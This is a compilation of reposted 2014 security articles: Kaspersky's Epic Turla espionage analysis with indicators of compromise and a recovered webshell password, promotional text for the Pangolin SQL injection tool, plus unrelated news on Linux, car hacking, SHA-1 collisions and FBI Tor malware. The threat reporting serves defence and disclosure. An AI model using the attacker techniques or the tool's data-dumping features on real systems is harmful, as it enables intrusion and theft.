Valid signature from Sysprint AG on Epic dropper This file was distributed from the Ministry of Foreign Affairs of Tajikistan's website, at "hxxp://mfa[.]tj/upload/security.php". The file is a .NET application that contains an encrypted resource. This drops the malicious file with the MD5 7731d42b043865559258464fe1c98513. This is an Epic backdoor which connects to the following C&Cs, with a generic internal ID of 1156fd22-3443-4344-c4ffff: [TABLE] [TR] [TD] hxxp://homaxcompany[.]com/components/com_sitemap/ hxxp://www.hadilotfi[.]com/wp-content/themes/profile/[/TD] [/TR] [/TABLE] A full list with all the C&C server URLs that we recovered from the samples can be found in the technical Appendix. The Epic command-and-control infrastructure The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality. The huge network commanded by the Epic Turla attackers serves multiple purposes. For instance, the motherships function as both exploitation sites and command and control panels for the malware. Here's how the big picture looks like: Epic Turla lifecycle The first level of command and control proxies generally talk to a second level of proxies, which in turn, talk to the "mothership" server. The mothership server is generally a VPS, which runs the Control panel software used to interact with the victims. The attackers operate the mothership using a network of proxies and VPN servers for anonymity reasons. The mothership also work as the exploitation servers used in the watering hole attacks, delivering Java, IE or fake applications to the victim. We were able to get a copy of one of the motherships, which provided some insight into the operation. It runs a control panel which is password protected: Epic mothership control panel login Once logged into the Control panel, the attackers can see a general overview of the system including the number of interesting potential targets: Epic control panel status overview A very interesting file on the servers is task.css, where the attackers define the IP ranges they are interested in. To change the file, they are using the "Task editor" from the menu. Depending on the "tasks", they will decide whether to infect the visitors or not. In this case, we found they targeted two ranges belonging to: "Country A" - Federal Government Network "Country B" - Government Telecommunications and Informatics Services Network It should be noted though, the fact that the attackers were targeting these ranges doesn't necessarily mean they also got infected. Some other unknown IPs were also observed in the targeting schedules. There is also an "except.css" file where attackers log the reasons they didn't try to exploit certain visitors. There are three possible values: TRY DON'T TRY -> Version of the browser and OS does not meet the conditions DON'T TRY -> (2012-09-19 10:02:04) - checktime These are the "don't meet the conditions" reasons observed in the logs: Windows 7 or 2008 R2 MSIE 8.0 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E) Adobe Shockwave 11.5.1.601 Adobe Flash 10.3.181.14 Adobe Reader 10.1.0.0 Win Media Player 12.0.7601.17514 Quick Time null MS Word null Java null The Epic / Tavdig / Wipbot backdoor For this first stage of the attack, the threat actor uses a custom backdoor. In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult. The CVE-2013-5065 exploit allows the backdoor to achieve administrator privileges on the system and run unrestricted. This exploit only works on unpatched Microsoft Windows XP systems. Other known detection names for the backdoor is Trojan.Wipbot (Symantec) or Tavdig. The main backdoor is about 60KB in size and implements a C&C protocol on top of normal HTTP requests. The communication protocol uses requests in the C&C replies, which the malware decrypts and processes. The replies are sent back to the C&C through the same channel. The malware behavior is defined by a configuration block. The configuration block usually contains two hard-coded C&C URLs. He have also seen one case where the configuration block contains just one URL. The configuration can also be updated on the fly by the attackers, via the C&C. The backdoor attempts to identify the following processes and, if found, it will terminate itself: tcpdump.exe windump.exe ethereal.exe wireshark.exe ettercap.exe snoop.exe dsniff.exe It contains an internal unique ID, which is used to identify the victim to the C&C. Most samples, especially old ones, have the ID 1156fd22-3443-4344-c4ffff. Once a victim is confirmed as "interesting", the attackers upload another Epic backdoor which has a unique ID used to control this specific victim. During the first C&C call, the backdoor sends a pack with the victim's system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware. Through monitoring, we were able to capture a large amount of commands sent to the victims by the attackers, providing an unique view into this operation. Here's a look at one of the encrypted server replies: Once a victim is infected and "checks in" with the server, the attackers send a template of commands: Next, the attackers try to move through the victim's network using pre-defined or collected passwords: Listing all .doc files recursively is also a common "theme": In total, we have decoded several hundreds of these command packages delivered to the victims, providing an unique insight into the inner workings of the attackers. In addition to generic searches, some very specific lookups have been observed as well. These include searches for: *NATO*.msg eu energy dialogue*.* EU*.msg Budapest*.msg In this case, the attackers were interested to find e-mails related to "NATO", "Energy Dialogue within European Unition" and so on. For some of the C&C servers, the attackers implemented RSA encryption for the C&C logs, which makes it impossible to decrypt them. This scheme was implemented in April 2014. Lateral movement and upgrade to more sophisticated backdoors Once a victim is compromised, the attackers upload several tools that are used for lateral movement. One such tool observed in the attacks and saved as "C:\Documents and Settings\All users\Start Menu\Programs\Startup\winsvclg.exe" is: [TABLE] [TR] [TD] Name: winsvclg.exe MD5: a3cbf6179d437909eb532b7319b3dafe Compiled: Tue Oct 02 13:51:50 2012[/TD] [/TR] [/TABLE] This is a keylogger tool that creates %temp%\~DFD3O8.tmp. Note: the filename can change across victims. On one Central Asian government's Ministry of Foreign Affairs victim system, the filename used was "adobe32updt.exe". In addition to these custom tools, we observed the usage of standard administration utilities. For instance, another tool often uploaded by the attackers to the victim's machine is "winrs.exe": [TABLE] [TR] [TD] Name: winrs.exe MD5: 1369fee289fe7798a02cde100a5e91d8 [/TD] [/TR] [/TABLE] This is an UPX packed binary, which contains the genuine "dnsquery.exe" tool from Microsoft, unpacked MD5: c0c03b71684eb0545ef9182f5f9928ca. In several cases, an interesting update has been observed -- a malware from a different, yet related family. [TABLE] [TR] [TD] Size: 275,968 bytes MD5: e9580b6b13822090db018c320e80865f Compiled: Thu Nov 08 11:05:35 2012[/TD] [/TR] [/TABLE] another example: [TABLE] [TR] [TD] Size: 218,112 bytes MD5: 071d3b60ebec2095165b6879e41211f2 Compiled: Thu Nov 08 11:04:39 2012[/TD] [/TR] [/TABLE] This backdoor is more sophisticated and belongs to the next level of cyber-espionage tools called the "Carbon system" or Cobra by the Turla attackers. Several plugins for the "Carbon system" are known to exist. Decoded configuration for e9580b6b13822090db018c320e80865f Note: the command and control servers www.losguayaberos[.]com and thebesttothbrushes[.]com have been sinkholed by Kaspersky Lab. Other packages delivered to the victims include: [TABLE] [TR] [TD] MD5: c7617251d523f3bc4189d53df1985ca9 MD5: 0f76ef2e6572befdc2ca1ca2ab15e5a1[/TD] [/TR] [/TABLE] These top level packages deploy both updated Epic backdoors and Turla Carbon system backdoors to confirmed victims, effectively linking the Epic and Turla Carbon operations together. The Turla Carbon dropper from these packages has the following properties: [TABLE] [TR] [TD] MD5: cb1b68d9971c2353c2d6a8119c49b51f [/TD] [/TR] [/TABLE] This is called internally by the authors "Carbon System", part of the "Cobra" project, as it can be seen from the debug path inside: This acts as a dropper for the following modules, both 32 and 64 bit: [TABLE=width: 70%] [TR] [TD=width: 70%]MD5[/TD] [TD=width: 30%]Resource number[/TD] [/TR] [TR] [TD]4c1017de62ea4788c7c8058a8f825a2d[/TD] [TD]101[/TD] [/TR] [TR] [TD]43e896ede6fe025ee90f7f27c6d376a4[/TD] [TD]102[/TD] [/TR] [TR] [TD]e6d1dcc6c2601e592f2b03f35b06fa8f[/TD] [TD]104[/TD] [/TR] [TR] [TD]554450c1ecb925693fedbb9e56702646[/TD] [TD]105[/TD] [/TR] [TR] [TD]df230db9bddf200b24d8744ad84d80e8[/TD] [TD]161[/TD] [/TR] [TR] [TD]91a5594343b47462ebd6266a9c40abbe[/TD] [TD]162[/TD] [/TR] [TR] [TD]244505129d96be57134cb00f27d4359c[/TD] [TD]164[/TD] [/TR] [TR] [TD]4ae7e6011b550372d2a73ab3b4d67096[/TD] [TD]165[/TD] [/TR] [/TABLE] The Carbon system is in essence an extensible platform, very similar to other attack platforms such as the Tilded platform or the Flame platform. The plugins for the Carbon system can be easily recognized as they always feature at least two exports named: ModuleStart ModuleStop Carbon system plugin with characteristic exports Several Epic backdoors appear to have been designed to work as Carbon system plugins as well - they require a specialized loader to start in victim systems that do not have the Carbon system deployed. Some modules have artifacts which indicate the Carbon system is already at version 3.x, although the exact Carbon system version is very rarely seen in samples: The author of the Carbon module above can be also seen in the code, as "gilg", which also authored several other Turla modules. We are planning to cover the Turla Carbon system with more details in a future report. Language artifacts The payload recovered from one of the mothership servers (at newsforum.servehttp[.]com/wordpress/wp-includes/css/img/upload.php, MD5: 4dc22c1695d1f275c3b6e503a1b171f5, Compiled: Thu Sep 06 14:09:55 2012) contains two modules, a loader/injector and a backdoor. Internally, the backdoor is named "Zagruzchick.dll": The word "Zagruzchick" means "boot loader" in Russian. The Control panel for the Epic motherships also sets the language to codepage "1251": Codepage 1251 is commonly used to render Cyrillic characters. There are other indications that the attackers are not native English language speakers: Password it´s wrong! Count successful more MAX File is not exists File is exists for edit The sample e9580b6b13822090db018c320e80865f that was delivered to several Epic victims as an upgraded backdoor, has the compilation code page language set to "LANG_RUSSIAN". The threat actor behind the "Epic" operation uses mainly hacked servers to host their proxies. The hacked servers are controlled through the use of a PHP webshell. This shell is password protected; the password is checked against an MD5 hash: The MD5 "af3e8be26c63c4dd066935629cf9bac8" has been solved by Kaspersky Lab as the password "kenpachi". In February 2014 we observed the Miniduke threat actor using the same backdoor on their hacked servers, although using a much stronger password. Once again, it is also interesting to point out the usage of Codepage 1251 in the webshell, which is used to render Cyrillic characters. There appears to be several links between Turla and Miniduke, but we will leave that for a future blogpost. Victim statistics On some of the C&C servers used in the Epic attacks, we were able to identify detailed victim statistics, which were saved for debugging purposes by the attackers. This is the country distribution for the top 20 affected countries by victim's IP: According to the public information available for the victims' IPs, targets of "Epic" belong to the following categories: Government Ministry of interior (EU country) Ministry of trade and commerce (EU country) Ministry of foreign/external affairs (Asian country, EU country) Intelligence (Middle East, EU Country) [*]Embassies [*]Military (EU country) [*]Education [*]Research (Middle East) [*]Pharmaceutical companies [*]Unknown (impossible to determine based on IP/existing data) Summary When G-Data published their Turla paper, there were few details publicly available on how victims get infected with this malware campaign. Our analysis indicates this is a sophisticated multi-stage infection; which begins with Epic Turla. This is used to gain a foothold and validate the high profile victim. If the victim is interesting, they get upgraded to the Turla Carbon system. Most recently, we observed this attack against a Kaspersky Lab user on August 5, 2014, indicating the operation remains fresh and ongoing. Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services customers. Contact: intelreports@kaspersky.com We would like to add the following at the end of the blogpost, right before the detection names: Further reading If you'd like to read more about Turla/Uroburos, here's a few recommendations: G-Data's paper "Uroburos Highly complex espionage software with Russian roots" BAE Systems analysis of "The Snake campaign" "Uroburos: the snake rootkit", technical analysis by deresz and tecamac "TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos" by CIRCL.LU Kaspersky products' detection names for all the malware samples described in this post: Backdoor.Win32.Turla.an Backdoor.Win32.Turla.ao Exploit.JS.CVE-2013-2729.a Exploit.JS.Pdfka.gkx Exploit.Java.CVE-2012-1723.eh Exploit.Java.CVE-2012-1723.ou Exploit.Java.CVE-2012-1723.ov Exploit.Java.CVE-2012-1723.ow Exploit.Java.CVE-2012-4681.at Exploit.Java.CVE-2012-4681.au Exploit.MSExcel.CVE-2009-3129.u HEUR:Exploit.Java.CVE-2012-1723.gen HEUR:Exploit.Java.CVE-2012-4681.gen HEUR:Exploit.Java.Generic HEUR:Exploit.Script.Generic HEUR:Trojan.Script.Generic HEUR:Trojan.Win32.Epiccosplay.gen HEUR:Trojan.Win32.Generic HackTool.Win32.Agent.vhs HackTool.Win64.Agent.b Rootkit.Win32.Turla.d Trojan-Dropper.Win32.Dapato.dwua Trojan-Dropper.Win32.Demp.rib Trojan-Dropper.Win32.Injector.jtxs Trojan-Dropper.Win32.Injector.jtxt Trojan-Dropper.Win32.Injector.jznj Trojan-Dropper.Win32.Injector.jznk Trojan-Dropper.Win32.Injector.khqw Trojan-Dropper.Win32.Injector.kkkc Trojan-Dropper.Win32.Turla.b Trojan-Dropper.Win32.Turla.d Trojan.HTML.Epiccosplay.a Trojan.Win32.Agent.iber Trojan.Win32.Agent.ibgm Trojan.Win32.Agentb.adzu Trojan.Win32.Inject.iujx Trojan.Win32.Nus.g Trojan.Win32.Nus.h Technical Appendix with IOCs Sursa: The Epic Turla Operation - Securelist

pangolin Pangolin is a penetration testing, SQL Injection test tool for database security. It finds SQL Injection vulnerabilities.Its goal is to detect and take inform you of SQL injection vulnerabilities in web applications. Once it detects an SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user”s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more. Documentation Pangolin White Paper Pangolin Data Sheet Pangolin User Guide Video Demonstration Inject SQL Server Inject MySQL More Demos Here ScreenShot Pangolin FAQ Click Here Database support: Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase. Pangolin is recommended by many Web security experts all over the world. [TABLE] [TR] [TD]OWASP[/TD] [TD]http://www.owasp.org/index.php/SQL_Injection#References[/TD] [/TR] [TR] [TD]Red Database Security[/TD] [TD]1. Oracle Security Videos 2. http://blog.red-database-security.com/2009/03/05/web-application-testing-with-pangolin-video-screenshot/print/[/TD] [/TR] [TR] [TD]SECURITY DATABASE[/TD] [TD]http://www.security-database.com/toolswatch/Focus-on-Pangolin-SQL-Injection.html[/TD] [/TR] [/TABLE] Features Here is parts of features: HTTPS support Pre-Login Proxy Specify any HTTP headers(User-agent, Cookie, Referer and so on) Bypass firewall setting Auto-analyzing keyword Detailed check options Injection-points management 15 Days Full Function(No Limitation) Trial Sursa: pangolin « NOSEC – Serving More People

jsky What is JSky? JSky is a web vulnerability scanner and web application vulnerability assessment tool. Documentation JSky White Paper JSky Data Sheet JSky Quick Start JSky User Guide ScreenShot Video Demonstration Quick Scan Your Website With NOSEC JSky What can JSky do? JSky is a Web Application Security Vulnerability scanner that can scan for the following Web Application Security Vulnerabilities: * SQL Injection * Cross-Site Scripting * Insecure Indexing * Local path disclosure * Server Misconfiguration * And all we application threats. And JSky is not only a scanner, but also an assessment tool. Why should I use JSky? Look at these features and benefits, we think you will love it right away: 1. Powerful web spider and multi-threaded scanner crawls hundreds of thousands of pages with ease, also supports extract links from JavaScript and flash. 2. Advanced and in-depth SQL injection testing from our Pangolin software, which precisely locates security vulnerabilities. Our software uses proprietary methods that go beyond pattern matching. This is what enables us to be so precise in locating security vulnerabilities. 3. JSky provides both an XML based vulnerability file, and an integrated security vulnerability executive parser. This makes it easy to design a vulnerability test. All you need to do is edit the XML file – no further compatibility coding required. 4. Easy to use. We have worked hard to create a product that does not require advanced internet security knowledge. The value of JSky JSky can inspect all aspects of your Web application, looking for vulnerabilities in your website. Using advanced artificial hacking intelligence, JSky probes your site’s defenses to find the areas that require further attention. JSky lets you see what a hacker would see if he were attacking your site. This knowledge allow you to fix the vulnerability . A few examples of people that will benefit from JSky include: * Penetration tester * Website administrator * And so much more…… Security on web is of the utmost importance. Without Web application testing, credit card transactions can be easily compromised. Thus, processing with credit card,PCI DSS compliance is enforced. Consultant using JSky provide web security service to help you match PCI DSS. System Requirements * 1 GB of memory * 2 GB of free disk space * 1.5 GHz Processor or better * Windows 2000/Windows XP/Windows 2003/Windows Vista/Windows7 Keywords: information security, security on web, web application testing, web applications security, web vulnerability scanner, security assessment, PCI DSS, web security service, vulnerability assessments. 15 Days Full Function(No Limitation) Trial Sursa: jsky « NOSEC – Serving More People

[h=1]PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery[/h] August 7th, 2014, 11:55 GMT · By Silviu Stahie PCLinuxOS 2014.07, a free Linux distribution aimed at desktop computers and laptops and relying on KDE, has been released with numerous package updates. PCLinuxOS comes with many flavors, but the default is actually KDE. The developers also make a few other versions, like KDE MiniMe, LXDE, or FullMonty, but this is the main one downloaded by most users. The distribution actually follows a rolling release model, which means that new major features and other changes are introduced regularly through the update channel. Every month, the download ISOs are regenerated with the new update, but if you already have the operating system installed you only have to update it regularly. “The KDE MiniMe iso provides a basic KDE desktop and is intended for advanced users who know how to fine-tune their system. To keep this iso small no printer drivers are included. The KDE Full Version ISO provides a standard KDE desktop with many popular applications and out-of-the-box driver support for generic desktop computing,” reads the official announcement. According to the changelog, the Linux kernel now used in the distribution is 3.15.4, which is one of the most recent. It's not exactly top-of-the line, but it's new enough that users won't have any problems with newer hardware. PCLinuxOS is still using KDE 4.12.3, which is a rather old version. The developers of this distro have been using this desktop for quite some time, but an upgrade should arrive pretty soon. Also, Nvidia and ATI fglrx driver support is available, multimedia playback support for many popular formats has been added, the LibreOffice Manager can install LibreOffice supporting over 100 languages, and MyLiveCD allows users to take a snapshot of the installation. The developers have also explained that “in case of low or missing speaker volume users need to click the speaker-icon at the bottom right of the panel, then on ‘Mixer’, and raise the volume sliders.” The system requirements for this interesting OS are quite low, if you want to give it a try. Users will need a modern Intel or AMD processor (preferably for 32-bit), 1 GB or more RAM memory (recommended 4 GB+), 10 GB or more HDD space, and NVIDIA, ATI HD 4000, or better graphics card to enjoy the 3D desktop and all the effects. More details about this Linux distribution can be found in the official changelog. You can download PCLinuxOS 2014.07 right now from Softpedia. A new version of the more complete PCLinuxOS FullMonty should also arrive pretty soon. [h=2]PCLINUXOS - PHOTO GALLERY:[/h] [TABLE=class: news_index_hot] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [/TABLE] Sursa: PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery

[h=1]Blackhat 2014[/h] Built binaries for BH2014 Digging for Sandbox Escapes workshop. Link: https://github.com/tyranid/bh2014

Indeed Engineering Blog » Blog Archive Bug Bounty Program: Cash Rewards for Reported Vulnerabilities » Indeed Engineering Blog

Car Hacking Enters Remote Exploitation Phase by Michael Mimoso LAS VEGAS – Charlie Miller and Chris Valasek have proven to be adept backseat drivers. Noted for their car-hacking exploits, Miller and Valasek have gained fame at hacking conferences and on Fox News for forcing automobiles to do their bidding. However, until today’s talk at the Black Hat 2014 conference, the two researchers’ exploits required them to be plugged in directly to their targets, literally sitting in the back seat of an automobile injecting code into its computers. No more. Miller and Valasek delivered a brisk talk explaining the soft spots in automobile networks that open a car up to remote exploit. They also provided a quick overview of specific car makers’ and models’ exploitability and demonstrated their version of an intrusion detection system that blocks some of their remote exploits. “We looked for a big attack surface,” said Miller, a security engineer at Twitter. Remote car attacks don’t look much different than attacks against conventional networks, Miller said. Attackers need a vulnerability in wireless communication protocol, such as Bluetooth, and then take that over in order to have the ability to pass messages to different functions of the car, such as steering or braking. The researchers said that many car manufacturers segment their autos’ internal networks, forcing communication through a centralized bus that would require a hacker to go through two hops in order to force the car to brake hard or take over steering, for example. Some vehicles, such as the Cadillac Escalade 2015, have a radio module that sits on a low- and high-speed bus, they said, enabling a hacker to send messages to both ends if they’re able to get in. “Car hacking is hard,” Miller said. “There’s lots of complexity, and the more technology you introduce, the more problems you have.” Further complicating the scenario is the difficulty in patching automobile software. Valasek said there are significant costs to the manufacturer, not only in producing the patch, but also in contacting customers who then must take their vehicles to a dealer for a software update. “It’s going to be really hard when an exploit comes out and everyone has a vulnerability that needs to be fixed,” said Valasek, director of vehicle security research at IOActive. Once an attacker finds a vulnerability that allows him to send messages over Bluetooth, for example, it’s helpful if the vehicle has a lot of what the researchers call cyber-physical features to exploit. Some of those include self-parking, active lane control, pre-collision systems and adaptive cruise control. All of those require some communication between a sensor and the brakes, acceleration or steering, usually over Bluetooth or some other radio signal. Some features are more inviting to attackers than others. The passive antitheft system, tire pressure monitoring system or remote keyless entry offer a limited attack surface, either because they don’t exchange a lot of data or require close proximity for communication. Bluetooth capabilities, the radio data system and telematics systems that allow cellular or Wi-Fi capabilities, significantly expand a car’s attack surface. Worse, on the horizon are either in-car apps, or connectivity to the Internet via a web browser. “Lots more people know how to write a Web exploit than a TPMS exploit,” Valasek said. “A lot of people can write a malicious app, or pop a browser. If that’s on the same network as your brakes or steering, that’s bad.” “This is growing, and the scariest area,” Miller added. Valasek said his and Miller’s goals for this segment of their research was to look at a broader scope of cars, how they communicate wirelessly to the outside world, and provide a lightweight Consumer Reports-type of rating system. “Why can’t we as an industry start rating automobiles, and hopefully that promotes changes within organizations,” Valasek said. Miller and Valasek said they will release a 95-page paper detailing their findings on a number of new automobiles from Audi, Honda, Infiniti, Jeep, Dodge and others. Sursa: Car Hacking Enters Remote Exploitation Phase at Black Hat | Threatpost | The first stop for security news

Malicious SHA-1 TL;DR: If the four 32-bit constants of SHA-1 can be modified, then exploitable collisions can be constructed. No need to panic, this doesn’t affect the original SHA-1. However, vendors and customers of products with custom cryptography will be interested. Summary This is the webpage of the Malicious SHA-1 project, a research project that demonstrates how the security of the SHA-1 hashing standard can be fully compromised if one slightly tweaks some of the predefined constants in the SHA-1 algorithm. That is, we show that systems using “custom” versions of SHA-1 may include backdoors exploitable by the designers. Such custom versions of cryptographic standards are typically found in proprietary systems as a way to personalize the cryptography for a given customer, while retaining the security guarantees of the original algorithm. The colliding messages constructed can be valid archives files (RAR or 7zip) such that the content of the two archives can be fully controlled. We also build colliding JPEG files, which can be any two images, as in the example below (images were chosen at random): We can also construct colliding executables, with MBR (Master Boot Record) or COM files including arbitrary code. Furthermore, we present polyglot malicious SHA-1 instances, that is, for which the designer can create colliding files of different types with arbitrary content (for example: any two MBR’s, any two RAR archives, and any two shell scripts) The Malicious SHA-1 project was presented in 2014 at the following security and cryptography conferences: BSidesLV (Aug 5; Las Vegas, USA) DEF CON Skytalks (Aug 9; Las Vegas, USA) Selected Areas in Cryptography (Aug 14-15 Montreal Canada) Implications of this research are discussed in our FAQ. More details are given below, and a full description of our work is reported in the research paper. Sursa: https://malicioussha1.github.io/

Blackhat USA Multipath TCP Tool Release & Audience Challenge We hope everyone found something interesting in our talk today on Multipath TCP. We’ve posted the tools and documents mentioned in the talk at: https://github.com/Neohapsis/mptcp-abuse At the end we invited participants to explore MPTCP in a little more depth via a PCAP challenge. Without further ado, here’s the PCAP: neohapsis_mptcp_challenge.pcapng It’s a simple scenario: one MPTCP-capable machine sending data to another. The challenge is “simply” to reassemble and recover the original data. The data itself is not complex so you should be able to tell if you’re on the right track, but getting it exactly right will require some understanding of how MPTCP works. If you think you have it, tweet us and follow us (@secvalve and @coffeetocode) and we’ll PM you to check your solution. You can also ask for questions/clarifications on twitter; use #BHMPTCP so others can follow along. Winner snags a $100 Amazon gift card! Hints #0: The latest version of Wireshark supports decoding mptcp options (see “tcp.options.mptcp”). The scapy version in the git repo is based on Nicolas Maitre’s and supports decoding mptcp options. It will help although you don’t strictly need it. The is an mptcp option field to tell the receiver how a tcp packet fits into the overall logical mptcp data flow (what it is and how it works is an exercise for the user ) It’s possible to get close with techniques that don’t fully understand MPTCP (you’ll know you’re close). However the full solution should match exactly (we’ll use md5sum) Depending on how people do and questions we get, we’ll update here with a few more hints tonight or tomorrow. Once we’ve got a winner, we’ll post the solution and code examples. Sursa: Neohapsis Labs | Blackhat USA Multipath TCP Tool Release & Audience Challenge

[h=1]Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now[/h] August 7th, 2014, 07:08 GMT · By Bogdan Popa Security vendor Kaspersky has warned today that an old vulnerability in Windows, which has already been patched by Microsoft, is being actively exploited right now by cybercriminals worldwide, so customers should accelerate their patching process to make sure they’re secure. Flagged by Microsoft as CVE-2010-2568, the vulnerability was being used by hackers in cyber attacks against Iran’s nuclear program and was first reported to the software giant in 2010, with a patch released soon after that. “Despite this, Kaspersky Lab detection systems are still registering tens of millions of detections of CVE-2010-2568 exploits. Over the study period, more than 50 million detections on more than 19 million computers worldwide were recorded,” Kaspersky explains. According to the same report, the vulnerability affects all Windows versions on the market with the exception of Windows 8 and 8.1, but given the fact that the majority of users are now running Windows XP and 7, it’s critical to patch these systems as soon as possible. As for the causes that are making exploits possible, Kaspersky says that “it is an error in processing tags in Windows OS enabling the download of random dynamic library without the user’s awareness.” Hackers could thus drop malware on vulnerable computers, which could be then used in new attacks or for spreading malware to even more systems that are yet to be patched. “The first malware exploiting this vulnerability was registered in July 2010. The worm Sality uses this vulnerability to distribute its own code: Sality generates vulnerable tags and distributes them through the LAN. If a user opens a folder containing one of these vulnerable tags, the malicious program immediately begins to launch. After Sality and Stuxnet this vulnerability was used by the well-known Flame and Gauss spyware,” Kaspersky explains. At this point, computers in Vietnam, China, and India are said to be the most vulnerable to attacks because the patch released by Microsoft in 2010 is yet to be installed on these systems. “Vietnam (42.45%), India (11.7%) and Algeria (5.52%) are among the leaders for the number of Kaspersky Lab detections of one of the most dangerous Windows vulnerabilities currently known. Interestingly, according our research, the outdated XP OS is also widely used in all these countries,” it says. Of course, the popularity of Windows XP is still causing issues, as 25 percent of the world’s desktop computers are still said to be running this particular operating system. Microsoft stopped providing support for Windows XP in April 2014, so no other updates and security patches are being released for this OS version. The old CVE-2010-2568 fix is however available via Windows Update. Sursa: Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now

[h=1]FBI infected PCs on a large scale to persecute alleged criminals[/h] by paganinip on August 7th, 2014 [h=2]A report disclosed by Wired suggests that the FBI is using a malware to identify Tor users by infecting machines on a large scale.[/h] It’s not a mystery that usage of the Tor network represents a problem for investigators of law enforcement agencies and for government entities that need to track users on the popular anonymizing network. Last year the FBI dismantled the Tor hosting service Freedom Hosting in a large scale investigation on child pornography. FBI used a malicious code able to exploit a Firefox Zero-day for Firefox 17 version that allowed it to track Tor users. The malware implants a tracking cookie which fingerprinted suspects through a specific external server. The exploit is based on a Javascript that is a tiny Windows executable hidden in a variable dubbed “Magneto”. Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI Virginia server exposing the victims’s real IP address. The script sends back the data with a standard HTTP web request outside the Tor Network. Articol: FBI infected PCs on a large scale to persecute alleged criminals | Security Affairs